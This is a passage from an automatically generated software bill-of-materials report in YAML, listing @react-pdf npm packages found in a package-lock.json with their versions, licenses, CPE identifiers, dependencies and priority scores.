- sbom
- package
raw:
id: bfc90f0951098a84
name: '@react-pdf/layout'
version: 3.13.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/layout:\@react-pdf\/layout:3.13.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/layout:\@react_pdf\/layout:3.13.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/layout:\@react-pdf\/layout:3.13.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/layout:\@react_pdf\/layout:3.13.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/layout:3.13.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/layout:3.13.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/layout@3.13.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/layout/-/layout-3.13.0.tgz
integrity: sha512-lpPj/EJYHFOc0ALiJwLP09H28B4ADyvTjxOf67xTF+qkWd+dq1vg7dw3wnYESPnWk5T9NN+HlUenJqdYEY9AvA==
dependencies:
'@babel/runtime': ^7.20.13
'@react-pdf/fns': 2.2.1
'@react-pdf/image': ^2.3.6
'@react-pdf/pdfkit': ^3.2.0
'@react-pdf/primitives': ^3.1.1
'@react-pdf/stylesheet': ^4.3.0
'@react-pdf/textkit': ^4.4.1
'@react-pdf/types': ^2.6.0
cross-fetch: ^3.1.5
emoji-regex: ^10.3.0
queue: ^6.0.1
yoga-layout: ^2.0.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 18357a3fbdd2a393
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/pdfkit 3.2.0'
title: '@react-pdf/pdfkit 3.2.0'
description: 'Package discovered: @react-pdf/pdfkit 3.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3f225c34b86f8909
name: '@react-pdf/pdfkit'
version: 3.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react-pdf\/pdfkit:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react_pdf\/pdfkit:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react-pdf\/pdfkit:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react_pdf\/pdfkit:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/pdfkit:3.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/pdfkit:3.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/pdfkit@3.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-3.2.0.tgz
integrity: sha512-OBfCcnTC6RpD9uv9L2woF60Zj1uQxhLFzTBXTdcYE9URzPE/zqXIyzpXEA4Vf3TFbvBCgFE2RzJ2ZUS0asq7yA==
dependencies:
'@babel/runtime': ^7.20.13
'@react-pdf/png-js': ^2.3.1
browserify-zlib: ^0.2.0
crypto-js: ^4.2.0
fontkit: ^2.0.2
jay-peg: ^1.0.2
vite-compatible-readable-stream: ^3.6.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a9e659420a7b937a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/pdfkit 5.1.1'
title: '@react-pdf/pdfkit 5.1.1'
description: 'Package discovered: @react-pdf/pdfkit 5.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 24d45580f4c0f7bb
name: '@react-pdf/pdfkit'
version: 5.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react-pdf\/pdfkit:5.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react_pdf\/pdfkit:5.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react-pdf\/pdfkit:5.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react_pdf\/pdfkit:5.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/pdfkit:5.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/pdfkit:5.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/pdfkit@5.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-5.1.1.tgz
integrity: sha512-wNcdSsNlNYyGHGAgIdt453egBF7fiF9UxpRlklUfVvu8OWCrUppG9xiUrPLVoKiqWet5tMi0w6LmuFUJuYqjEg==
dependencies:
'@babel/runtime': ^7.20.13
'@noble/ciphers': ^1.0.0
'@noble/hashes': ^1.6.0
browserify-zlib: ^0.2.0
fontkit: ^2.0.2
jay-peg: ^1.1.1
js-md5: ^0.8.3
linebreak: ^1.1.0
png-js: ^2.0.0
vite-compatible-readable-stream: ^3.6.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: aadf20f14ed3a63a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/png-js 2.3.1'
title: '@react-pdf/png-js 2.3.1'
description: 'Package discovered: @react-pdf/png-js 2.3.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ecd22ec88d1d110f
name: '@react-pdf/png-js'
version: 2.3.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/png-js:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/png-js:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/png_js:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/png_js:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/png:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/png:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/png:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/png:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/png-js@2.3.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/png-js/-/png-js-2.3.1.tgz
integrity: sha512-pEZ18I4t1vAUS4lmhvXPmXYP4PHeblpWP/pAlMMRkEyP7tdAeHUN7taQl9sf9OPq7YITMY3lWpYpJU6t4CZgZg==
dependencies:
browserify-zlib: ^0.2.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4f8cb527e021a217
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/primitives 3.1.1'
title: '@react-pdf/primitives 3.1.1'
description: 'Package discovered: @react-pdf/primitives 3.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 18694a13e91dacfb
name: '@react-pdf/primitives'
version: 3.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react-pdf\/primitives:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react_pdf\/primitives:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react-pdf\/primitives:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react_pdf\/primitives:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/primitives:3.1.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/primitives:3.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/primitives@3.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/primitives/-/primitives-3.1.1.tgz
integrity: sha512-miwjxLwTnO3IjoqkTVeTI+9CdyDggwekmSLhVCw+a/7FoQc+gF3J2dSKwsHvAcVFM0gvU8mzCeTofgw0zPDq0w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2743499890ec5e22
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/primitives 4.3.0'
title: '@react-pdf/primitives 4.3.0'
description: 'Package discovered: @react-pdf/primitives 4.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: edf229ed71e6ba52
name: '@react-pdf/primitives'
version: 4.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react-pdf\/primitives:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react_pdf\/primitives:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react-pdf\/primitives:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react_pdf\/primitives:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/primitives:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/primitives:4.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/primitives@4.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/primitives/-/primitives-4.3.0.tgz
integrity: sha512-nYXoZ36pvwNzbc54+DbL8RCn15jU7woJ9D/svnh5tpUXekJ+CbI4mZLo6boSv24CvJgychOu6h7gxX03B4ps0A==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: ea34747c8a1e8321
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/render 3.5.0'
title: '@react-pdf/render 3.5.0'
description: 'Package discovered: @react-pdf/render 3.5.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3e1fba314601b9a8
name: '@react-pdf/render'
version: 3.5.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/render:\@react-pdf\/render:3.5.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/render:\@react_pdf\/render:3.5.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/render:\@react-pdf\/render:3.5.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/render:\@react_pdf\/render:3.5.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/render:3.5.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/render:3.5.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/render@3.5.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/render/-/render-3.5.0.tgz
integrity: sha512-gFOpnyqCgJ6l7VzfJz6rG1i2S7iVSD8bUHDjPW9Mze8TmyksHzN2zBH3y7NbsQOw1wU6hN4NhRmslrsn+BRDPA==
dependencies:
'@babel/runtime': ^7.20.13
'@react-pdf/fns': 2.2.1
'@react-pdf/primitives': ^3.1.1
'@react-pdf/textkit': ^4.4.1
'@react-pdf/types': ^2.6.0
abs-svg-path: ^0.1.1
color-string: ^1.9.1
normalize-svg-path: ^1.1.0
parse-svg-path: ^0.1.2
svg-arc-to-cubic-bezier: ^3.2.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9ecea192844aa50b
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/renderer 3.4.5'
title: '@react-pdf/renderer 3.4.5'
description: 'Package discovered: @react-pdf/renderer 3.4.5'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d2a573a75d297737
name: '@react-pdf/renderer'
version: 3.4.5
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/renderer:\@react-pdf\/renderer:3.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/renderer:\@react_pdf\/renderer:3.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/renderer:\@react-pdf\/renderer:3.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/renderer:\@react_pdf\/renderer:3.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/renderer:3.4.5:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/renderer:3.4.5:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/renderer@3.4.5
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/renderer/-/renderer-3.4.5.tgz
integrity: sha512-O1N8q45bTs7YuC+x9afJSKQWDYQy2RjoCxlxEGdbCwP+WD5G6dWRUWXlc8F0TtzU3uFglYMmDab2YhXTmnVN9g==
dependencies:
'@babel/runtime': ^7.20.13
'@react-pdf/font': ^2.5.2
'@react-pdf/layout': ^3.13.0
'@react-pdf/pdfkit': ^3.2.0
'@react-pdf/primitives': ^3.1.1
'@react-pdf/render': ^3.5.0
'@react-pdf/types': ^2.6.0
events: ^3.3.0
object-assign: ^4.1.1
prop-types: ^15.6.2
queue: ^6.0.1
scheduler: ^0.17.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 25636a50f9953390
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/stylesheet 4.3.0'
title: '@react-pdf/stylesheet 4.3.0'
description: 'Package discovered: @react-pdf/stylesheet 4.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 618f90b9a2f3d884
name: '@react-pdf/stylesheet'
version: 4.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react-pdf\/stylesheet:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react_pdf\/stylesheet:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react-pdf\/stylesheet:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react_pdf\/stylesheet:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/stylesheet:4.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/stylesheet:4.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/stylesheet@4.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-4.3.0.tgz
integrity: sha512-x7IVZOqRrUum9quuDeFXBveXwBht+z/6B0M+z4a4XjfSg1vZVvzoTl07Oa1yvQ/4yIC5yIkG2TSMWeKnDB+hrw==
dependencies:
'@babel/runtime': ^7.20.13
'@react-pdf/fns': 2.2.1
'@react-pdf/types': ^2.6.0
color-string: ^1.9.1
hsl-to-hex: ^1.0.0
media-engine: ^1.0.3
postcss-value-parser: ^4.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 97286ac4a749af60
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/stylesheet 6.2.1'
title: '@react-pdf/stylesheet 6.2.1'
description: 'Package discovered: @react-pdf/stylesheet 6.2.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ff4544477cbe31d7
name: '@react-pdf/stylesheet'
version: 6.2.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react-pdf\/stylesheet:6.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react_pdf\/stylesheet:6.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react-pdf\/stylesheet:6.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react_pdf\/stylesheet:6.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/stylesheet:6.2.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/stylesheet:6.2.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/stylesheet@6.2.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-6.2.1.tgz
integrity: sha512-2+UEk+7e+z8baaWi2l5kPLWmwtJeOI+T5wW9GGeN3iDH7vd3kbTqOpN1yt9mmfNVZFxQsnDHpznFb5v5UF983A==
dependencies:
'@react-pdf/fns': 3.1.3
'@react-pdf/types': ^2.11.1
color-string: ^2.1.4
hsl-to-hex: ^1.0.0
media-engine: ^1.0.3
postcss-value-parser: ^4.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: aac5b1fed64c15db
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/textkit 4.4.1'
title: '@react-pdf/textkit 4.4.1'
description: 'Package discovered: @react-pdf/textkit 4.4.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9a502dcbe994e863
name: '@react-pdf/textkit'
version: 4.4.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/textkit:\@react-pdf\/textkit:4.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/textkit:\@react_pdf\/textkit:4.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/textkit:\@react-pdf\/textkit:4.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/textkit:\@react_pdf\/textkit:4.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/textkit:4.4.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/textkit:4.4.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/textkit@4.4.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/textkit/-/textkit-4.4.1.tgz
integrity: sha512-Jl9wdTqIvJ5pX+vAGz0EOhP7ut5Two9H6CzTKo/YYPeD79cM2yTXF3JzTERBC28y7LR0Waq9D2LHQjI+b/EYUQ==
dependencies:
'@babel/runtime': ^7.20.13
'@react-pdf/fns': 2.2.1
bidi-js: ^1.0.2
hyphen: ^1.6.4
unicode-properties: ^1.4.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d6967341a8bbb112
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: @react-pdf/types 2.11.1'
title: '@react-pdf/types 2.11.1'
description: 'Package discovered: @react-pdf/types 2.11.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3103913e34f4201d
name: '@react-pdf/types'
version: 2.11.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:\@react-pdf\/types:\@react-pdf\/types:2.11.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react-pdf\/types:\@react_pdf\/types:2.11.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/types:\@react-pdf\/types:2.11.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react_pdf\/types:\@react_pdf\/types:2.11.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react-pdf\/types:2.11.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:\@react:\@react_pdf\/types:2.11.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/%40react-pdf/types@2.11.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/@react-pdf/types/-/types-2.11.1.tgz
integrity: sha512-i9xQgfaDU9QoeNnbp6rltXCWg1huEh195rpOuN8cE4BZ2FuLdQrsIcb2dhFF9aOxXf+XBA6LOSpIW051MDD/bw==
dependencies:
'@react-pdf/font': ^4.0.8
'@react-pdf/primitives': ^4.3.0
'@react-pdf/stylesheet': ^6.2.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
